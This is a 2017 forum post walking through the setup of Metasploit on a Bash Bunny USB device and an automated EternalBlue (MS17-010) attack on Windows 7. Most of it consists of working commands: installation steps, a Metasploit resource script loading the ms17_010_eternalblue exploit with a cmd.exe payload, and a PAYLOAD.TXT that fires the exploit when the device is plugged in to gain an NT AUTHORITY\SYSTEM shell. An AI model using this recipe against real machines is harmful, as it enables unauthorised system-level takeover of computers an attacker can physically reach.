hanshaze Posted September 25, 2017 Share Posted September 25, 2017 (edited) My latest BashBunny-Challenge.....MSF - MS17_010 - BashBunny Thanks to Astr0baby, iam just a sharer of his excellent thoughts Lets go..... Make sure to set some date for TLS/SSL to work ;) # date -s "20170925" Add this to /etc/apt/sources.list deb http://http.us.debian.org/debian/ jessie-updates main # apt-get update # apt-get -y install autoconf bison build-essential curl git-core libapr1 libaprutil1 libcurl4-openssl-dev libgmp3-dev # curl -sSL https://get.rvm.io | bash -s stable # source /etc/profile.d/rvm.sh # rvm requirements # rvm list known # rvm install 2.4.1 # vi /root/.bashrc Add at the end source /etc/profile/rvm.sh rvm use 2.4.1 --default # mkdir /root/METASPLOIT # cd /root/METASPLOIT/ # wget https://raw.githubusercontent.com/iam1980/metasploit-vps-installer/master/msf_vps_installer.sh # chmod +x msf_vps_installer.sh # ./msf_vps_installer.sh # git config --global user.name "USER" # git config --global user.email "email@example.com" # ./msfupdate Check the /etc/dhcp/dhcpd.conf range 172.16.64.10 - 172.16.64.12 and set to only one value range 172.16.64.64 - 172.16.64.64 Save this to ~/metasploit-framework as cmd.rc ----- use exploit/windows/smb/ms17_010_eternalblue set PAYLOAD windows/x64/exec set RHOST 172.16.64.64 set CMD cmd.exe exploit ----- The above is ideal when we want to get a NT SYSTEM/AUTHORITY shell on the target Windows 7 SP1 x64 (unlocked) If the target is locked we can use another payload such this one So RHOST would be again 172.16.64.64 and LHOST 172.16.64.1 … This can be easily scripted via Metasploit RC script so ;) The Metasploit RC scripts should be placed in the /root/metasploit-framework on the Bashbunny so we can call it from the PAYLOAD.TXT for the corresponding Attach Switch position . So ideally this would look like this (switch1 or switch 2) payload.txt #!/bin/bash LED SETUP ATTACKMODE RNDIS_ETHERNET #Set some current time ..... check your watch date -s "20170523 23:23" LED ATTACK /root/metasploit-framework/msfconsole -r /root/metasploit-framework/eternal-cmd.rc & LED FINISH The target Windows 7 should have an accessible SMB port 445 from the USB network that Bashbunny device create. Default Windows system has a firewall on so the attack wont work as the port is blocked. For the demonstration purpose we assume there is no firewall on .. After a while you should get a NT AUTHORITY\ SYSTEM cmd shell pop up on your Win 7 desktop :) Edited September 25, 2017 by hanshaze Quote Link to comment Share on other sites More sharing options...
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.